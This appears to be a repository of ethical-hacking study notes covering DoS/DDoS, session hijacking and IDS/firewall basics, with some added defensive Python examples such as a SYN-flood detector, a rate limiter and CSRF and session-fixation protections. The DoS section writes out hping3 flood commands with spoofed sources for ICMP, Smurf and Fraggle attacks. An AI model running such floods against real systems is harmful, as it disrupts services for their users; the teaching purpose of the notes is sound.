├── 1-Introduction.md
├── 10-Denial-of-Service.md
├── 11-Session-Hijacking.md
├── 12-Evading-IDS-Firewalls-and-Honeypots.md
├── 13-Hacking-Web-Servers.md
├── 14-Hacking-Web-Applications.md
├── 14-Pentesting.md
├── 16-Hacking-Wireless-Networks.md
├── 17-Hacking-Mobile-Platforms-and-IoT.md
├── 19-Cloud Computing.md
├── 2-Footprinting-and-Reconnaissance.md
├── 20-Cryptography.md
├── 3-Scanning-Networks.md
├── 5-Vulnerability-Analysis.md
├── 6-System-Hacking.md
├── 7-Malware.md
├── 8-Sniffing.md
├── 9-Social-Engineering.md
├── All-Modules.html
├── All-Modules.md
└── README.md
/10-Denial-of-Service.md:
--------------------------------------------------------------------------------
1 | # Denial of Service
2 |
3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/9-Denial-of-Service)**
4 |
5 | ## DoS
6 | *A Denial of Service (DoS) is a type of attack on a service that disrupts its normal function and prevents other users from accessing it. The most common target for a DoS attack is an online service such as a website, though attacks can also be launched against networks, machines or even a single program.*
7 |
8 | DoS attacks can cause the following problems:
9 | - Ineffective services
10 | - Inaccessible services
11 | - Interruption of network traffic
12 | - Connection interference
13 |
14 | ## DDoS
15 | *A distributed denial of service (DDoS) attack is launched from numerous compromised devices, often distributed globally in what is referred to as a **botnet**.*
16 |
17 | 
18 |
19 | **Goal:**
20 | - Seeks to take down a system or deny access to it by authorized users.
21 |
22 | ### **Botnet**
23 | *Network of zombie computers a hacker uses to start a distributed attack.*
24 | - Botnets can be designed to do malicious tasks including sending **spam, stealing data, ransomware, fraudulently clicking on ads or distributed denial-of-service (DDoS) attacks.**
25 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ
26 |
27 | 
28 |
29 | - **Botnet Scanning Methods**:
30 | - **Random** - Randomly looks for vulnerable devices
31 | - **Hitlist** - Given a list of devices to scan for vulnerabilities
32 | - **Topological** - Scan hosts discovered by currently exploited devices
33 | - **Local subnet** - Scans local network for vulnerable devices
34 | - **Permutation** - Scan list of devices created through pseudorandom permutation algorithm
35 |
36 |
37 |
38 | ## Three Types of DoS / DDoS
39 |
40 | ### **1. Volumetric attacks**
41 | - Consumes the bandwidth of target network or service.
42 | - Send a massive amount of traffic to the target network with the goal of consuming **so much bandwidth** that users are denied access.
43 | - Bandwidth depletion attacks: flood attacks and amplification attacks.
44 |
45 | - **Attacks**:
46 | - UDP flood attack
47 | - ICMP flood attack
48 | - Ping of Death attack
49 | - Smurf attack (IP)
50 | - Fraggle (UDP)
51 | - Malformed IP packet flood attack
52 | - Spoofed IP packet flood attack
53 |
54 | > - ⚠️ **Volumetric attacks are measured in bits per second (bps).**
55 |
56 | ### **2. Protocol Attacks**
57 | - Consume other types of resources like **connection state tables** present in the network infrastructure components such as **load balancers, firewalls, and application servers**.
58 | - **Attacks**:
59 | - SYN flood attack
60 | - Fragmentation attack
61 | - ACK flood attack
62 | - TCP state exhaustion attack
63 | - TCP connection flood attack
64 | - RST attack
65 |
66 | > - ⚠️ **Protocol attacks are measured in packets per second (pps).**
67 |
68 | ### **3. Application Layer Attacks**
69 |
70 | - Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more.
71 | - Consume the resources necessary for the application to run.
72 | - Target web servers, web application and specific web-based apps.
73 | - Abuse higher-layer (7) protocols like HTTP/HTTPS and SNMP.
74 | - **Attacks**:
75 | - HTTP GET/POST attack
76 | - Slowloris attack
77 |
78 | > - ⚠️ **Application layer attacks are measured in requests per second (rps).**
79 |
80 | > - ⚠️ **Application level attacks are against weak code.**
81 |
82 |
83 | ## Attacks explanation
84 |
85 | ### **IP Fragmentation attacks**
86 | - IP / ICMP fragmentation attack is a common form of volumetric DoS. In such an attack, datagram fragmentation mechanisms are used to overwhelm the network.
87 |
88 | - Bombard the destination with fragmented packets, causing it to use memory to reassemble all those fragments and overwhelm a targeted network.
89 |
90 | - **Can manifest in different ways:**
91 | - **UDP Flooding** - attacker sends large volumes of fragments from numerous sources.
92 | - **UDP and ICMP** fragmentation attack - only parts of the packets are sent to the target; since the packets are fake and can't be reassembled, the server's resources are quickly consumed.
93 | - **TCP fragmentation attack** - also known as a Teardrop attack, targets TCP/IP reassembly mechanisms; fragmented packets are prevented from being reassembled. The result is that data packets overlap and the targeted server becomes completely overwhelmed.
94 |
95 | ### **TCP state-exhaustion attack**
96 | - Attempt to consume connection state tables like: **Load balancers, firewalls and application servers.**
97 |
98 | ### **Slowloris attack**
99 | *Is an application layer attack which operates by utilizing partial HTTP requests. The attack functions by opening connections to a targeted Web server and then keeping those connections open as long as it can.*
100 |
102 |
103 | - The attacker first opens multiple connections to the targeted server by sending multiple partial HTTP request headers.
104 | - The target opens a thread for each incoming request
105 | - To prevent the target from timing out the connections, the attacker periodically sends partial request headers to the target in order to keep the request alive. In essence saying, “I’m still here! I’m just slow, please wait for me.”
106 | - The targeted server is never able to release any of the open partial connections while waiting for the termination of the request.
107 | - Once all available threads are in use, the server will be unable to respond to additional requests made from regular traffic, resulting in denial-of-service.
108 |
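A server-side counter to the behaviour described above, added here as an example (it is not part of the original notes): a guard that tracks one connection's partial HTTP header and drops the connection when the header has not completed within a total deadline, when the client pauses too long between bytes, or when it keeps trickling header lines past a size cap. The timeout values, the trace format and the three traces are constructed for the example.

```python
# Added example: per-connection guard against slow partial-header clients.
# The policy values are assumptions chosen for the illustration.
HEADER_DEADLINE = 10.0   # whole header must arrive within 10 s of the connection opening
IDLE_LIMIT = 3.0         # no gap between received chunks may exceed 3 s
MAX_HEADER_BYTES = 8192  # cap on bytes buffered while waiting for the header to complete


class SlowHeaderGuard:
    """Buffers one connection's request header and decides when to give up on it."""

    def __init__(self, opened_at, deadline=HEADER_DEADLINE, idle_limit=IDLE_LIMIT):
        self.opened_at = opened_at
        self.last_byte_at = opened_at
        self.deadline = deadline
        self.idle_limit = idle_limit
        self.buf = b""

    def feed(self, chunk, now):
        """Return 'complete', 'pending' or a 'drop:<reason>' verdict for a chunk seen at `now`."""
        if now - self.last_byte_at > self.idle_limit:
            return "drop:idle"          # client went quiet: the "please wait for me" pause
        if now - self.opened_at > self.deadline:
            return "drop:deadline"      # header still incomplete after the total budget
        self.last_byte_at = now
        self.buf += chunk
        if len(self.buf) > MAX_HEADER_BYTES:
            return "drop:too-large"     # endless trickle of bogus header lines
        if b"\r\n\r\n" in self.buf:
            return "complete"           # the blank line terminates the header block
        return "pending"


def run_trace(trace, deadline=HEADER_DEADLINE, idle_limit=IDLE_LIMIT):
    """Replay a list of (seconds_since_start, bytes) chunks for one connection."""
    guard = SlowHeaderGuard(trace[0][0], deadline, idle_limit)
    verdict = "pending"
    for t, chunk in trace:
        verdict = guard.feed(chunk, t)
        if verdict != "pending":
            break
    return verdict


# Constructed traces (not captured traffic).
NORMAL_CLIENT = [
    (0.00, b"GET / HTTP/1.1\r\nHost: www.example.test\r\n"),
    (0.05, b"User-Agent: demo\r\n\r\n"),
]
SLOW_CLIENT = [   # partial header, then one bogus line every 2.9 s; the blank line never comes
    (0.0, b"GET / HTTP/1.1\r\nHost: www.example.test\r\n"),
    (2.9, b"X-a: 1\r\n"), (5.8, b"X-a: 2\r\n"), (8.7, b"X-a: 3\r\n"), (11.6, b"X-a: 4\r\n"),
]
STALLED_CLIENT = [(0.0, b"GET / HTTP/1.1\r\n"), (4.0, b"Host: www.example.test\r\n\r\n")]

if __name__ == "__main__":
    for name, trace in [("normal", NORMAL_CLIENT), ("slow", SLOW_CLIENT), ("stalled", STALLED_CLIENT)]:
        print(name, run_trace(trace))
```

Production servers implement the same idea as request-read timeouts (Apache's `mod_reqtimeout`, nginx's `client_header_timeout`): a connection's lifetime is bounded by progress on the request, not by the client's willingness to keep sending header fragments, so a slow client can no longer pin a worker indefinitely.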
109 | ### **SYN attack**
110 | - Sends thousands of SYN packets
111 | - Uses a **false source address** / spoofed IP address.
112 | - The server then responds to each one of the connection requests and leaves an open port ready to receive the response.
113 | - Eventually engages all resources and exhausts the machine
114 |
115 | ### **SYN flood (half-open attack)**
116 | - Sends thousands of SYN packets
117 | - While the **server waits for the final ACK packet**, **which never arrives**, the attacker continues to send more SYN packets. The arrival of each new SYN packet causes the server to temporarily maintain a new open port connection for a certain length of time, and once all the available ports have been utilized the server is unable to function normally.
118 | - Eventually bogs down the computer, runs out of resources.
119 |
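A detection-side check for the half-open condition described above, added as an example (not from the original notes): it parses connection-table lines in the column layout of `ss -tan` and reports when the number of `SYN-RECV` entries, overall or per source /24, exceeds a threshold. The sample table, the thresholds and the listener address are constructed for the example. Because a SYN flood usually spoofs random source addresses, the per-prefix count may stay low while the total backlog still climbs, which is why both are checked.

```python
from collections import Counter
import ipaddress

# Constructed sample in the column layout of `ss -tan` (State, Recv-Q, Send-Q,
# Local Address:Port, Peer Address:Port). Addresses are documentation ranges.
SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN    0      128    0.0.0.0:80          0.0.0.0:*
ESTAB     0      0      10.0.0.10:80        198.51.100.7:51234
SYN-RECV  0      0      10.0.0.10:80        203.0.113.15:40001
SYN-RECV  0      0      10.0.0.10:80        203.0.113.99:40002
SYN-RECV  0      0      10.0.0.10:80        203.0.113.42:40003
SYN-RECV  0      0      10.0.0.10:80        203.0.113.8:40004
SYN-RECV  0      0      10.0.0.10:80        192.0.2.5:40005
ESTAB     0      0      10.0.0.10:443       198.51.100.9:51300
"""


def parse_ss(text):
    """Return (state, local, peer) tuples from ss-style output, skipping the header line."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 5:
            rows.append((parts[0], parts[3], parts[4]))
    return rows


def peer_prefix(peer):
    """Map 'ip:port' (IPv6 as '[ip]:port') to its /24 (IPv4) or /64 (IPv6) prefix."""
    host, _, _ = peer.rpartition(":")
    ip = ipaddress.ip_address(host.strip("[]"))
    bits = 24 if ip.version == 4 else 64
    return str(ipaddress.ip_network(f"{ip}/{bits}", strict=False))


def half_open_report(rows, max_half_open=4, max_per_prefix=3):
    """Count SYN-RECV entries overall and per source prefix; the thresholds are assumptions."""
    by_prefix = Counter(peer_prefix(peer) for state, _, peer in rows if state == "SYN-RECV")
    half_open = sum(by_prefix.values())
    findings = []
    if half_open > max_half_open:
        findings.append(f"{half_open} half-open connections exceed limit {max_half_open}")
    for prefix, n in by_prefix.items():
        if n > max_per_prefix:
            findings.append(f"{n} half-open connections from {prefix} exceed limit {max_per_prefix}")
    return {"half_open": half_open, "by_prefix": dict(by_prefix), "findings": findings}


if __name__ == "__main__":
    report = half_open_report(parse_ss(SAMPLE_SS))
    print(report["half_open"], "half-open connections")
    for finding in report["findings"]:
        print("ALERT:", finding)
```

On Linux the usual kernel-side mitigation for the condition this detects is SYN cookies (`net.ipv4.tcp_syncookies`), which stop the backlog from filling in the first place; the report above is still useful as the signal that the flood is happening.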
121 |
122 | ### **ICMP flood**
123 | - Sends ICMP Echo packets with a spoofed address; eventually reaches limit of packets per second sent
124 | - It is possible to use `hping3` to perform an ICMP flood:
125 | - `hping3 -1 --flood --rand-source `
126 |
127 | ### **Smurf attack**
128 | - The Smurf attack is a **distributed denial-of-service** attack in which large numbers of ICMP packets with the intended victim's **spoofed source IP are broadcast to a computer network using an IP broadcast address.**
129 | - It is possible to use `hping3` to perform this attack, with a bash script to loop through the subnet:
130 | - `hping3 -1 -c 1000 10.0.0.$i --fast -a `
132 |
133 | ### **Fraggle**
134 | - Same concept as Smurf attack but with **UDP packets** (UDP flood attack).
135 | - It is possible to use `hping3` to perform a Fraggle attack / UDP flood:
136 | - `hping3 --flood --rand-source --udp -p `
137 |
138 | ### **Ping of Death**
139 | - Fragments ICMP messages; after reassembly, the ICMP packet is larger than the maximum allowed size and crashes the system.
140 | - Performed by sending an IP packet larger than the 65,536 bytes allowed by the IP protocol.
141 | - Old technique that may still work against old, unpatched systems.
142 |
143 | ### **Teardrop**
144 | - Overlaps a large number of garbled IP fragments with oversized payloads; causes older systems to crash due to fragment reassembly
145 |
146 | ### **Peer to peer**
147 | - Clients of a peer-to-peer file-sharing hub are disconnected and directed to connect to the target system instead.
148 |
149 | ### **Multi-vector attack**
150 | - Is a combination of **Volumetric, protocol, and application-layer attacks**.
151 |
152 | ### **Phlashing / Permanent DoS**
153 | - A DoS attack that causes permanent damage to a system.
154 | - Modifies the firmware and can also cause a **system to brick**.
155 | - *e.g.: sending a fraudulent hardware/firmware update to the victim that crashes the BIOS.*
156 |
157 | ### **LAND attack**
158 | - Sends a SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes
159 |
160 |
161 | ## DoS/DDoS Attack Tools:
162 | - **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests
164 |
165 | - **High Orbit Ion Cannon** (HOIC) - More powerful version of LOIC; targets TCP and UDP. The application can open up to 256 simultaneous attack sessions at once, bringing down a target system by sending a continuous stream of junk traffic until legitimate requests can no longer be processed.
167 |
168 | - **Other Tools**
169 | - HULK
170 | - Metasploit
171 | - Nmap
172 | - Tsunami
173 | - Trinity - Linux based DDoS tool
174 | - Tribe Flood Network - uses voluntary botnet systems to launch massive flood attacks
175 | - RUDY (R-U-Dead-Yet?) - DoS with HTTP POST via long-form field submissions
176 |
177 | ## Mitigations
178 | - Traffic analysis
179 | - Filtering
180 | - Firewalls
181 | - ACLs
182 | - Reverse Proxies
183 | - Rate limiting - limiting the maximum number of connections a single IP address is allowed to make
184 | - Load balancers
185 | - DoS prevention software
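
The rate-limiting item above, worked through as an added example that is not part of the original notes: a per-client limiter that caps both the number of concurrently open connections and the rate of new connections in a sliding window, replayed over a constructed stream of open/close events. The limits, addresses and timings are assumptions.

```python
from collections import Counter, defaultdict, deque


class ConnectionLimiter:
    """Per-client limits: at most `max_concurrent` open connections and at most
    `rate_limit` accepted new connections per `window` seconds (sliding window)."""

    def __init__(self, max_concurrent=2, rate_limit=5, window=2.0):
        self.max_concurrent = max_concurrent
        self.rate_limit = rate_limit
        self.window = window
        self.open_count = Counter()              # ip -> currently open connections
        self.recent_opens = defaultdict(deque)   # ip -> timestamps of accepted opens

    def on_open(self, ip, now):
        """Return 'allow' or 'deny:<reason>' for a new connection attempt from `ip`."""
        q = self.recent_opens[ip]
        while q and now - q[0] >= self.window:   # forget accepts that left the window
            q.popleft()
        if len(q) >= self.rate_limit:
            return "deny:rate"
        if self.open_count[ip] >= self.max_concurrent:
            return "deny:concurrent"
        q.append(now)
        self.open_count[ip] += 1
        return "allow"

    def on_close(self, ip):
        if self.open_count[ip] > 0:
            self.open_count[ip] -= 1


def replay(events, limiter):
    """Feed chronologically ordered ('open'|'close', ip, t) events; count decisions per ip."""
    outcome = Counter()
    for kind, ip, t in events:
        if kind == "open":
            outcome[(ip, limiter.on_open(ip, t))] += 1
        else:
            limiter.on_close(ip)
    return outcome


# Constructed event stream (documentation addresses, seconds since start):
#   198.51.100.7 - ordinary client, one connection at a time
#   203.0.113.9  - rapid open/close cycle, i.e. a connection flood from one source
#   192.0.2.5    - holds connections open instead of closing them
FLOOD = [e for i in range(5)
         for e in (("open", "203.0.113.9", 1.0 + 0.1 * i), ("close", "203.0.113.9", 1.05 + 0.1 * i))]
EVENTS = sorted([
    ("open", "198.51.100.7", 0.0), ("close", "198.51.100.7", 0.5), ("open", "198.51.100.7", 3.0),
    ("open", "192.0.2.5", 0.0), ("open", "192.0.2.5", 0.9), ("open", "192.0.2.5", 1.8),
    ("close", "192.0.2.5", 2.0), ("open", "192.0.2.5", 2.5),
    ("open", "203.0.113.9", 1.5), ("open", "203.0.113.9", 4.0),
] + FLOOD, key=lambda e: e[2])

if __name__ == "__main__":
    for (ip, decision), n in sorted(replay(EVENTS, ConnectionLimiter()).items()):
        print(f"{ip:14} {decision:16} {n}")
```

The two limits catch different shapes of abuse: the concurrency cap stops a client that opens sockets and never closes them, the rate cap stops one that churns through short connections. Neither helps on its own against a distributed flood where every source stays under both limits; that is where the upstream filtering and load-balancing items in the list come in.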
186 |
--------------------------------------------------------------------------------
/11-Session-Hijacking.md:
--------------------------------------------------------------------------------
1 | # Session Hijacking
2 |
3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/10-Session-Hijacking)**
4 |
5 | *The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.* [[+]](https://owasp.org/www-community/attacks/Session_hijacking_attack)
6 |
7 | - Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user's connections.
8 | - The most useful method depends on a **token** that the Web Server sends to the client browser after a successful client authentication.
9 | - A **session token** is normally composed of a string of variable width and it could be used in different ways
10 | - like in the URL, in the header of the HTTP request as a cookie, in other parts of the header of the HTTP request, or in the body of the HTTP request.
11 |
12 | **The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.**
13 |
14 |
15 | *Figure: Session Hijacking using XSS*
16 |
19 |
20 |
21 | ## **The session token could be compromised in different ways; the most common are:**
22 |
23 | ### **Predictable session token**
24 | - The session ID for a given application is normally composed of a string of fixed width. **Randomness is very important** to avoid its prediction.
25 | - **Example:** Session ID value is “user01”, which corresponds to the username. By trying new values for it, like “user02”, it could be possible to get inside the application without prior authentication.
26 |
27 | ### **Session Sniffing**
28 | - Sniffing can be used to hijack a session when there is non-encrypted communication between the web server and the user, and the session ID is being sent in plain text.
29 | - **Wireshark** and **Kismet** can be used to capture sensitive data packets such as the session ID from the network.
30 |
31 | ### **Cross-site scripting (XSS)**
32 | - A server can be vulnerable to a cross-site scripting exploit, which enables an attacker to execute malicious code from the user’s side, gathering session information. An attacker can target a victim’s browser and send a scripted JavaScript link, which upon opening by the user, runs the malicious code in the browser hijacking sessions.
33 |
34 | ### **CSRF - Cross-Site Request Forgery**
35 | - Forces an end user to execute unwanted actions on a web application in which they're currently authenticated. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
36 | - A CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim has an administrative account, CSRF can compromise the entire web application.
37 |
38 | - **CSRF Scenario:**
39 | 1. Visit your bank's site, log in.
40 | 2. Then visit the attacker's site (e.g. sponsored ad from an untrusted organization).
41 | 3. Attacker's page includes form with same fields as the bank's "Transfer Funds" form.
42 | 4. Form fields are pre-filled to transfer money from your account to attacker's account.
43 | 5. Attacker's page includes JavaScript that submits the form to your bank.
44 | 6. When form gets submitted, browser includes your cookies for the bank site, including the session token.
45 | 7. Bank transfers money to attacker's account.
46 | 8. The form can be in an iframe that is invisible, so you never know the attack occurred.
47 |
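The defence against the scenario above, as an added example that is not part of the original notes: the bank's "Transfer Funds" handler accepts a state change only if the request carries an anti-CSRF token bound to the victim's session (which the attacker's page cannot read) and the `Origin`/`Referer` header names the bank's own site. The secret key, the site origin and the two requests are constructed for the example; in the forged request the browser still attaches the bank cookie, exactly as in step 6, so the cookie alone cannot tell the two apart.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumptions for the example: a per-deployment secret (a real app loads it from
# configuration) and the origin of the protected site.
SECRET_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "https://bank.example"


def issue_csrf_token(session_id):
    """Mint a token bound to the session: nonce plus an HMAC over (session_id, nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token):
    """A token copied from another session (or absent) fails; comparison is constant-time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def origin_allowed(headers):
    """Independent second check: Origin (or Referer) must name this site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # a state-changing request with no origin information is refused
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def accept_state_change(request, session_id):
    """Decide whether a request such as the 'Transfer Funds' POST may change state."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return False, "state changes must not be reachable by safe methods"
    if not origin_allowed(request["headers"]):
        return False, "cross-site origin"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token")):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed requests. The victim's browser attaches the bank cookie to both.
SESSION_ID = "sess-victim-1"
GENUINE_TRANSFER = {
    "method": "POST",
    "headers": {"Origin": "https://bank.example", "Cookie": f"SESSIONID={SESSION_ID}"},
    "form": {"to": "acct-1234", "amount": "100", "csrf_token": issue_csrf_token(SESSION_ID)},
}
FORGED_TRANSFER = {   # auto-submitted from the attacker's page: foreign Origin, no token
    "method": "POST",
    "headers": {"Origin": "https://attacker.example", "Cookie": f"SESSIONID={SESSION_ID}"},
    "form": {"to": "acct-attacker", "amount": "100"},
}

if __name__ == "__main__":
    print("genuine:", accept_state_change(GENUINE_TRANSFER, SESSION_ID))
    print("forged: ", accept_state_change(FORGED_TRANSFER, SESSION_ID))
```

Binding the token to the session ID is what makes a token harvested from the attacker's own account useless against the victim; the origin check is kept as a second, independent layer because either control alone has known failure modes (tokens leak through XSS, origin headers are sometimes stripped by proxies).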
48 | ### **Session Fixation**
49 | - Session Fixation is an attack that permits an attacker to hijack a valid user session. It exploits a limitation in the way the vulnerable web application manages the session ID.
50 |
51 | - **Session fixation Scenario**:
52 | 1. The attacker accesses the web application login page and **receives a session ID** generated by the web application.
53 | 2. The attacker uses an additional technique such as **CRLF Injection, man-in-the-middle attack, social engineering,** etc., and gets the victim to use the **provided session identifier**.
54 | 3. The victim accesses the web application login page and logs in to the application. After authenticating, the **web application treats anyone who uses this session ID as if they were this user.**
55 | 4. The attacker uses the session ID to access the web application, **take over the user session, and impersonate the victim**.
56 |
57 | ### **Man-in-the-browser attack**
58 | - The Man-in-the-Browser attack takes the same approach as a Man-in-the-Middle attack, but in this case a Trojan horse is used to intercept and manipulate calls between the main application's executable (e.g. the browser) and its security mechanisms or libraries.
59 |
60 | ### **Man-in-the-middle attack**
61 | - MITM attack is a general term for when a perpetrator positions himself in a conversation between a user and an application—either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway.
62 |
63 |
64 | ## Other attacks
65 | - **Compression Ratio Info-leak Made Easy (CRIME)**:
66 | - Is a security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking.
67 | - **BREACH**:
68 | - Is a security exploit against HTTPS when using HTTP compression (SSL/TLS compression). BREACH is built based on the CRIME security exploit.
69 |
70 | > ⚠️ **SPDY protocol manipulates HTTP traffic, with particular goals of reducing web page load latency and improving web security.**
71 |
72 | - **Forbidden Attack**
73 | A vulnerability in TLS implementations that incorrectly reuse the **same cryptographic nonce when data is encrypted**. The TLS specifications are clear that these arbitrary pieces of data should be used only once; when the same one is used more than once, it provides an opportunity to carry out the forbidden attack.
74 |
75 | ## Network Layer Attacks
76 | - **TCP Hijacking**: TCP/IP hijacking is when an unauthorized user gains access to a genuine network connection of another user. It is done to bypass the password authentication that normally starts a session.
77 | - e.g.: Telnet hijacking using Ettercap or Shijack (blind hijacking).
78 |
79 | ### **Tools**
80 | - **Ettercap** - MiTM tool and packet sniffer on steroids
81 | - **Hunt** - sniff, hijack and reset connections
82 | - **T-Sight** - easily hijack sessions and monitor network connections
83 | - **Zaproxy**
84 | - **Burp Suite**
85 | - **Paros**
86 | - **Shijack** - TCP/IP hijack tools
87 | - **Juggernaut**
88 | - **Hamster**
89 | - **Ferret**
90 |
91 | ## Countermeasures
92 | - **Session IDs**
93 | - Using unpredictable (randomized) Session IDs
94 | - Never put session IDs in URLs
95 | - Don't Re-use Session IDs
96 | - Use **HTTP-Only on Cookies** preventing XSS (Cross-Site Scripting)
97 | - Don't use HTTP protocol without encryption --> Use TLS/SSL [HTTPS]
98 | - Limiting incoming connections
99 | - Minimizing remote access
100 | - Regenerating the session key after authentication
101 | - Timeouts - absolute and inactivity-based *(e.g.: after 1h of inactivity the user is automatically logged off)*
102 | - Use **MFA**
103 | - Use **IPSec to encrypt**
104 |
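The session-ID countermeasures above, implemented together as an added example (not from the original notes): an in-memory session store that mints IDs from the OS CSPRNG, regenerates the ID at login so a fixated ID never becomes an authenticated session, enforces an inactivity timeout and an absolute lifetime, and emits the cookie with `HttpOnly`, `Secure` and `SameSite`. The timeout values, the cookie name and the timestamps are assumptions; `fixation_scenario()` replays the four fixation steps from the previous section against the store.

```python
import secrets

IDLE_TIMEOUT = 60 * 60        # 1 h of inactivity, as in the countermeasure list
ABSOLUTE_TIMEOUT = 8 * 3600   # assumed absolute lifetime regardless of activity


class SessionStore:
    """In-memory session table implementing the session-ID countermeasures."""

    def __init__(self):
        self._sessions = {}

    @staticmethod
    def _new_id():
        # 256 bits from the OS CSPRNG: not guessable, not sequential, not derived from the user
        return secrets.token_urlsafe(32)

    def create(self, now):
        """Anonymous (pre-login) session, e.g. handed out on the login page."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "created": now, "last_seen": now}
        return sid

    def login(self, old_sid, user, now):
        """Regenerate the ID at authentication: whatever ID the browser carried before
        login is discarded, so an attacker-supplied (fixated) ID never becomes a
        logged-in session."""
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid, now):
        """Return the session record, or None if unknown or timed out (and then delete it)."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s

    def logout(self, sid):
        self._sessions.pop(sid, None)


def session_cookie(sid):
    """Set-Cookie value: HttpOnly keeps scripts (XSS) from reading it, Secure keeps it off
    plain HTTP, SameSite=Lax keeps it off cross-site POSTs; the ID never goes in a URL."""
    return f"SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def fixation_scenario(now=1_700_000_000):
    """Replay the fixation steps: does the attacker's pre-set ID still work after login?"""
    store = SessionStore()
    fixated = store.create(now)                              # 1. attacker obtains an ID
    victim_sid = store.login(fixated, "victim", now + 60)    # 2-3. victim uses it and logs in
    attacker_view = store.lookup(fixated, now + 120)         # 4. attacker replays the fixated ID
    victim_view = store.lookup(victim_sid, now + 120)
    return {"attacker_sees": attacker_view, "victim_user": victim_view["user"]}


def timeout_scenario(now=1_700_000_000):
    """Idle timeout: activity at the limit keeps the session, silence past it ends it."""
    store = SessionStore()
    sid = store.login(None, "alice", now)
    alive = store.lookup(sid, now + IDLE_TIMEOUT) is not None
    expired = store.lookup(sid, now + 2 * IDLE_TIMEOUT + 1) is None
    return alive, expired


if __name__ == "__main__":
    print(fixation_scenario())
    print(timeout_scenario())
    print(session_cookie(SessionStore._new_id()))
```

The regeneration in `login()` is the single change that defeats fixation: the ID the attacker planted is deleted the moment the victim authenticates, so step 4 of the scenario returns nothing.
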
105 | ### IPSec
106 | - **Transport Mode** - payload and ESP trailer are encrypted; IP header is not
107 | - **Tunnel mode** - everything is encrypted; cannot be used with NAT
108 | - **Architecture Protocols**
109 | - **Authentication Header** - guarantees the integrity and authentication of IP packet sender
110 | - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality
111 | - **Internet Key Exchange** (IKE) - produces the keys for the encryption process
112 | - **Oakley** - uses Diffie-Hellman to create master and session keys
113 | - **Internet Security Association Key Management Protocol** (ISAKMP) - software that facilitates encrypted communication between two endpoints
114 |
--------------------------------------------------------------------------------
/12-Evading-IDS-Firewalls-and-Honeypots.md:
--------------------------------------------------------------------------------
1 | # Evading IDS, Firewalls and Honeypots
2 |
3 | ## IDS/IPS - Basic Concepts
4 |
5 | **Intrusion Prevention System (IPS)** - ACTIVE monitoring of activity looking for anomalies and alerting/notifying AND **taking action when they are found**.
6 |
7 | **Intrusion Detection System (IDS)** - PASSIVE monitoring of activity looking for anomalies and alerting/notifying when they are found.
8 |
9 |
10 |
11 |
12 |
13 | ### **Deployment Types - HIDS & NIDS & WIDS:**
14 | 1. **Host based** - Monitors activity on a single device/host by being installed locally.
15 |
16 | 2. **Network based** - Monitors activity across a network using remote sensors that report back to a central system. Often paired with a Security Information and Event Management (SIEM) system for analysis. Reverse ARP or reverse DNS lookups are often used to discover the source.
17 |
18 | ### **Knowledge & Behavior-Based Detection:**
19 | 1. **Knowledge Based (Signature Based | Pattern Matching)** - Most common form of detection. Uses a database of profiles, or signatures to assess all traffic against.
20 |
21 | 2. **Behavior Based (Statistical | Anomaly | Heuristic)** - Starts by creating a baseline of behavior for the monitored system/network and then compares all traffic against that baseline looking for deviations. Can be labeled an AI or expert system.
22 |
23 | ---
24 | ### **Types of IDS Alerts**
25 | - **True Positive** --> Attack - Alert ✅✅
26 | - **False Positive** --> No Attack - Alert ❌✅
27 | - **False Negative** --> Attack - No Alert ✅❌
28 | - *This is the worst scenario*
29 | - **True Negative** --> No Attack - No Alert ❌❌
30 |
31 | ---
32 |
33 | ## Firewalls - Basic Concepts
34 | *Firewalls are often seen as NAC devices. Use of rule sets to filter traffic can implement security policy.*
35 |
36 | ### **Firewalls types:**
37 | - **Stateful (Dynamic Packet Filtering)** - Layer 3 + 4 (Network + Transport layer)
38 | - **Stateless (Static Packet Filtering)** - Layer 3 (Network)
39 | - **Deep Packet Inspection** - Layer 7 (Application Layer)
